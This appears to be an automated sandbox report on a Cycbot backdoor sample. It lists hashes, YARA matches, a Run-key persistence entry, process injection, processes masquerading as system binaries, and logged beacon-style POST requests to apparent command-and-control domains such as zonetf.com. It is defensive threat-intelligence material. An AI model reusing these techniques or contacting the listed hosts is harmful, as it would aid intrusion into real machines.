Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
140s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
11/12/2024, 03:18 UTC
Static task
static1
Behavioral task
behavioral1
Sample
dfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
dfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exe
Resource
win10v2004-20241007-en
General
-
Target
dfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exe
-
Size
158KB
-
MD5
dfaff61cc52fd8046155a25223c445d7
-
SHA1
c21d9d718a42e3f1714da040967996a29dbc2fff
-
SHA256
fde118339d2df0a5ce48cd13eb7d352241530ab209d98527175e62549b2149b2
-
SHA512
58a8ca7dadb7c6fee9de8be91fa0d97740d6ff49caba96dd4d5580602ff46a48d5885ba6d5db1d5a6b0f4290f184c95cc227039a4aaf0b83e23eaafb3cfa8015
-
SSDEEP
3072:qc9iaVVscs9CVQ/6OPSINZLSGu9XoEKfUeRv1QqSOXCaj2L9rKZVaHUZK2TeuLt4:N9igscs9nNVuMceDQ9GsK3yUeOW
Malware Config
Signatures
-
Cycbot family
-
Detects Cycbot payload 5 IoCs
Cycbot is a backdoor and trojan written in C++.
resource yara_rule behavioral1/memory/2408-6-0x0000000000400000-0x0000000000442000-memory.dmp family_cycbot behavioral1/memory/2308-14-0x0000000000400000-0x0000000000442000-memory.dmp family_cycbot behavioral1/memory/2308-72-0x0000000000400000-0x0000000000442000-memory.dmp family_cycbot behavioral1/memory/1292-75-0x0000000000400000-0x0000000000442000-memory.dmp family_cycbot behavioral1/memory/2308-180-0x0000000000400000-0x0000000000442000-memory.dmp family_cycbot -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\conhost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\conhost.exe" dfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exe -
resource yara_rule behavioral1/memory/2308-2-0x0000000000400000-0x0000000000442000-memory.dmp upx behavioral1/memory/2408-5-0x0000000000400000-0x0000000000442000-memory.dmp upx behavioral1/memory/2408-6-0x0000000000400000-0x0000000000442000-memory.dmp upx behavioral1/memory/2308-14-0x0000000000400000-0x0000000000442000-memory.dmp upx behavioral1/memory/2308-72-0x0000000000400000-0x0000000000442000-memory.dmp upx behavioral1/memory/1292-75-0x0000000000400000-0x0000000000442000-memory.dmp upx behavioral1/memory/2308-180-0x0000000000400000-0x0000000000442000-memory.dmp upx -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2308 wrote to memory of 2408 2308 dfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exe 30 PID 2308 wrote to memory of 2408 2308 dfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exe 30 PID 2308 wrote to memory of 2408 2308 dfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exe 30 PID 2308 wrote to memory of 2408 2308 dfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exe 30 PID 2308 wrote to memory of 1292 2308 dfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exe 33 PID 2308 wrote to memory of 1292 2308 dfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exe 33 PID 2308 wrote to memory of 1292 2308 dfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exe 33 PID 2308 wrote to memory of 1292 2308 dfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exe 33
Processes
-
C:\Users\Admin\AppData\Local\Temp\dfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\dfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2308 -
C:\Users\Admin\AppData\Local\Temp\dfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\dfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exe startC:\Users\Admin\AppData\Roaming\dwm.exe%C:\Users\Admin\AppData\Roaming2⤵
- System Location Discovery: System Language Discovery
PID:2408
-
-
C:\Users\Admin\AppData\Local\Temp\dfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\dfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exe startC:\Users\Admin\AppData\Local\Temp\csrss.exe%C:\Users\Admin\AppData\Local\Temp2⤵
- System Location Discovery: System Language Discovery
PID:1292
-
Network
-
Remote address:8.8.8.8:53Requestpsfk.comIN AResponsepsfk.comIN A35.158.87.123
-
GEThttp://psfk.com/img/icons/twitter.png?v75=46&tq=gHZutDyMv5rJej%2Fia9nrmsl6giWz%2BJZbVyA%3Ddfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exeRemote address:35.158.87.123:80RequestGET /img/icons/twitter.png?v75=46&tq=gHZutDyMv5rJej%2Fia9nrmsl6giWz%2BJZbVyA%3D HTTP/1.0
Connection: close
Host: psfk.com
Accept: */*
User-Agent: mozilla/2.0
ResponseHTTP/1.1 301 Moved Permanently
Content-Type: text/html
Content-Length: 175
Connection: close
Location: https://psfk.com/img/icons/twitter.png?v75=46&tq=gHZutDyMv5rJej%2Fia9nrmsl6giWz%2BJZbVyA%3D
Server: my-server
-
Remote address:8.8.8.8:53Requestzonetf.comIN AResponsezonetf.comIN A13.248.169.48zonetf.comIN A76.223.54.146
-
Remote address:8.8.8.8:53Requestzonetf.comIN AResponsezonetf.comIN A76.223.54.146zonetf.comIN A13.248.169.48
-
Remote address:8.8.8.8:53Requestpdadatarestore.comIN AResponse
-
POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGk85Y61qn%2FzGT7iirepBIBqSOX60alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3Ddfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exeRemote address:76.223.54.146:80RequestPOST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGk85Y61qn%2FzGT7iirepBIBqSOX60alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
Host: zonetf.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
ResponseHTTP/1.1 405 Method Not Allowed
connection: close
-
POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGk85Y61qn%2FzGT7iirepBIBqSOX60alxtygbpb6HvnSAOQij%2B8yjYvEaS%2FT%2BsqtSr%2Fe%2BV5ZuRg%3D%3Ddfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exeRemote address:13.248.169.48:80RequestPOST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGk85Y61qn%2FzGT7iirepBIBqSOX60alxtygbpb6HvnSAOQij%2B8yjYvEaS%2FT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
Host: zonetf.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
ResponseHTTP/1.1 405 Method Not Allowed
connection: close
-
POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGk85Y61qn%2FzGT7iirepBIBqSOX60alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3Ddfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exeRemote address:13.248.169.48:80RequestPOST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGk85Y61qn%2FzGT7iirepBIBqSOX60alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D HTTP/1.1
Host: zonetf.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
ResponseHTTP/1.1 405 Method Not Allowed
connection: close
-
POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGk85Y61qn%2FzGT7iirepBIBqSOX60alxtygbpb6HvnSAOQij%2B82uYvEaS%2FT%2BsqlSr%2Fe%2BV5ZuRg%3D%3Ddfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exeRemote address:13.248.169.48:80RequestPOST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGk85Y61qn%2FzGT7iirepBIBqSOX60alxtygbpb6HvnSAOQij%2B82uYvEaS%2FT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
Host: zonetf.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
ResponseHTTP/1.1 405 Method Not Allowed
connection: close
-
POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGk85Y61qn%2FzGT7iirepBIBqSOX60alxtygbpb6HvnSAOQij%2B8yjYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3Ddfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exeRemote address:13.248.169.48:80RequestPOST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGk85Y61qn%2FzGT7iirepBIBqSOX60alxtygbpb6HvnSAOQij%2B8yjYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
Host: zonetf.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
ResponseHTTP/1.1 405 Method Not Allowed
connection: close
-
POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGk85Y61qn%2FzGT7iirepBIBqSOX60alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqlSr%2Fe%2BV5ZuRg%3D%3Ddfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exeRemote address:13.248.169.48:80RequestPOST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGk85Y61qn%2FzGT7iirepBIBqSOX60alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
Host: zonetf.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
ResponseHTTP/1.1 405 Method Not Allowed
connection: close
-
Remote address:8.8.8.8:53Requestsearchmobilecode.comIN AResponse
-
POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGk85Y61qn%2FzGT7iirepBIBqSOX60alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3Ddfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exeRemote address:13.248.169.48:80RequestPOST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGk85Y61qn%2FzGT7iirepBIBqSOX60alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D HTTP/1.1
Host: zonetf.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
ResponseHTTP/1.1 405 Method Not Allowed
connection: close
-
POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGk85Y61qn%2FzGT7iirepBIBqSOX60alxtygbpb6HvnSAOQij%2B82uYvEaSPT%2Bsq1Sr%2Fe%2BV5ZuRg%3D%3Ddfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exeRemote address:13.248.169.48:80RequestPOST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGk85Y61qn%2FzGT7iirepBIBqSOX60alxtygbpb6HvnSAOQij%2B82uYvEaSPT%2Bsq1Sr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
Host: zonetf.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
ResponseHTTP/1.1 405 Method Not Allowed
connection: close
-
POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGk85Y61qn%2FzGT7iirepBIBqSOX60alxtygbpb6HvnSAOQij%2B8CiYvEaSvT%2Bsqli8RpL6fhSr%2Fe%2BV5ZuRg%3D%3Ddfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exeRemote address:13.248.169.48:80RequestPOST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGk85Y61qn%2FzGT7iirepBIBqSOX60alxtygbpb6HvnSAOQij%2B8CiYvEaSvT%2Bsqli8RpL6fhSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
Host: zonetf.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
ResponseHTTP/1.1 405 Method Not Allowed
connection: close
-
Remote address:8.8.8.8:53Requestwww.google.comIN AResponsewww.google.comIN A172.217.20.164
-
Remote address:172.217.20.164:80RequestGET / HTTP/1.0
Connection: close
Host: www.google.com
Accept: */*
ResponseHTTP/1.0 302 Found
x-hallmonitor-challenge: CgwI1YnkugYQ49nX3QESBLXXsFM
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-350sGIWzxg2_uQtQgv_M7g' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
Date: Wed, 11 Dec 2024 03:19:49 GMT
Server: gws
Content-Length: 396
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AZ6Zc-V3agWwfBT01hIs9NH4ZJyIvVy71KF9yJ-Zul_Y6r5VflXvsXzXgQ; expires=Mon, 09-Jun-2025 03:19:49 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
-
Remote address:8.8.8.8:53Requesthostinganddedic.comIN AResponse
-
Remote address:172.217.20.164:80RequestGET / HTTP/1.1
Connection: close
Pragma: no-cache
Host: www.google.com
ResponseHTTP/1.1 302 Found
x-hallmonitor-challenge: CgwI1YnkugYQ5vOEsgMSBLXXsFM
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-8HphMWZ7GsAWM9iY1_qERw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
Date: Wed, 11 Dec 2024 03:19:49 GMT
Server: gws
Content-Length: 396
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AZ6Zc-U7kZtFHywSE9-fd2NYH5Eg2ohtz03vyRdwvTx43j1mPYnqLcyxFw; expires=Mon, 09-Jun-2025 03:19:49 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Connection: close
-
GEThttp://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGNWJ5LoGIjCVyp5t2t7BDdLyG7NkgyzoYiDStyEUyHsXYZsmIR1KfCDCTS_bcWdeaIHbMD-InPEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMdfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exeRemote address:172.217.20.164:80RequestGET /sorry/index?continue=http://www.google.com/&q=EgS117BTGNWJ5LoGIjCVyp5t2t7BDdLyG7NkgyzoYiDStyEUyHsXYZsmIR1KfCDCTS_bcWdeaIHbMD-InPEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
Connection: close
Pragma: no-cache
Host: www.google.com
ResponseHTTP/1.1 429 Too Many Requests
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html
Server: HTTP server (unknown)
Content-Length: 3075
X-XSS-Protection: 0
Connection: close
-
35.158.87.123:80http://psfk.com/img/icons/twitter.png?v75=46&tq=gHZutDyMv5rJej%2Fia9nrmsl6giWz%2BJZbVyA%3Dhttpdfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exe395 B 645 B 5 5
HTTP Request
GET http://psfk.com/img/icons/twitter.png?v75=46&tq=gHZutDyMv5rJej%2Fia9nrmsl6giWz%2BJZbVyA%3DHTTP Response
301 -
76.223.54.146:80http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGk85Y61qn%2FzGT7iirepBIBqSOX60alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3Dhttpdfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exe581 B 245 B 5 4
HTTP Request
POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGk85Y61qn%2FzGT7iirepBIBqSOX60alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3DHTTP Response
405 -
13.248.169.48:80http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGk85Y61qn%2FzGT7iirepBIBqSOX60alxtygbpb6HvnSAOQij%2B8yjYvEaS%2FT%2BsqtSr%2Fe%2BV5ZuRg%3D%3Dhttpdfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exe629 B 325 B 6 6
HTTP Request
POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGk85Y61qn%2FzGT7iirepBIBqSOX60alxtygbpb6HvnSAOQij%2B8yjYvEaS%2FT%2BsqtSr%2Fe%2BV5ZuRg%3D%3DHTTP Response
405 -
13.248.169.48:80http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGk85Y61qn%2FzGT7iirepBIBqSOX60alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3Dhttpdfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exe563 B 245 B 5 4
HTTP Request
POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGk85Y61qn%2FzGT7iirepBIBqSOX60alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3DHTTP Response
405 -
13.248.169.48:80http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGk85Y61qn%2FzGT7iirepBIBqSOX60alxtygbpb6HvnSAOQij%2B82uYvEaS%2FT%2BsqlSr%2Fe%2BV5ZuRg%3D%3Dhttpdfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exe629 B 325 B 6 6
HTTP Request
POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGk85Y61qn%2FzGT7iirepBIBqSOX60alxtygbpb6HvnSAOQij%2B82uYvEaS%2FT%2BsqlSr%2Fe%2BV5ZuRg%3D%3DHTTP Response
405 -
13.248.169.48:80http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGk85Y61qn%2FzGT7iirepBIBqSOX60alxtygbpb6HvnSAOQij%2B8yjYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3Dhttpdfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exe581 B 245 B 5 4
HTTP Request
POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGk85Y61qn%2FzGT7iirepBIBqSOX60alxtygbpb6HvnSAOQij%2B8yjYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3DHTTP Response
405 -
13.248.169.48:80http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGk85Y61qn%2FzGT7iirepBIBqSOX60alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqlSr%2Fe%2BV5ZuRg%3D%3Dhttpdfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exe581 B 245 B 5 4
HTTP Request
POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGk85Y61qn%2FzGT7iirepBIBqSOX60alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqlSr%2Fe%2BV5ZuRg%3D%3DHTTP Response
405 -
13.248.169.48:80http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGk85Y61qn%2FzGT7iirepBIBqSOX60alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3Dhttpdfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exe609 B 325 B 6 6
HTTP Request
POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGk85Y61qn%2FzGT7iirepBIBqSOX60alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3DHTTP Response
405 -
13.248.169.48:80http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGk85Y61qn%2FzGT7iirepBIBqSOX60alxtygbpb6HvnSAOQij%2B82uYvEaSPT%2Bsq1Sr%2Fe%2BV5ZuRg%3D%3Dhttpdfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exe581 B 245 B 5 4
HTTP Request
POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGk85Y61qn%2FzGT7iirepBIBqSOX60alxtygbpb6HvnSAOQij%2B82uYvEaSPT%2Bsq1Sr%2Fe%2BV5ZuRg%3D%3DHTTP Response
405 -
13.248.169.48:80http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGk85Y61qn%2FzGT7iirepBIBqSOX60alxtygbpb6HvnSAOQij%2B8CiYvEaSvT%2Bsqli8RpL6fhSr%2Fe%2BV5ZuRg%3D%3Dhttpdfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exe641 B 245 B 6 4
HTTP Request
POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGk85Y61qn%2FzGT7iirepBIBqSOX60alxtygbpb6HvnSAOQij%2B8CiYvEaSvT%2Bsqli8RpL6fhSr%2Fe%2BV5ZuRg%3D%3DHTTP Response
405 -
302 B 1.5kB 5 5
HTTP Request
GET http://www.google.com/HTTP Response
302 -
307 B 1.5kB 5 5
HTTP Request
GET http://www.google.com/HTTP Response
302 -
172.217.20.164:80http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGNWJ5LoGIjCVyp5t2t7BDdLyG7NkgyzoYiDStyEUyHsXYZsmIR1KfCDCTS_bcWdeaIHbMD-InPEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMhttpdfaff61cc52fd8046155a25223c445d7_JaffaCakes118.exe526 B 3.7kB 6 7
HTTP Request
GET http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGNWJ5LoGIjCVyp5t2t7BDdLyG7NkgyzoYiDStyEUyHsXYZsmIR1KfCDCTS_bcWdeaIHbMD-InPEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMHTTP Response
429 -
-
-
54 B 70 B 1 1
DNS Request
psfk.com
DNS Response
35.158.87.123
-
56 B 88 B 1 1
DNS Request
zonetf.com
DNS Response
13.248.169.4876.223.54.146
-
56 B 88 B 1 1
DNS Request
zonetf.com
DNS Response
76.223.54.14613.248.169.48
-
64 B 137 B 1 1
DNS Request
pdadatarestore.com
-
66 B 139 B 1 1
DNS Request
searchmobilecode.com
-
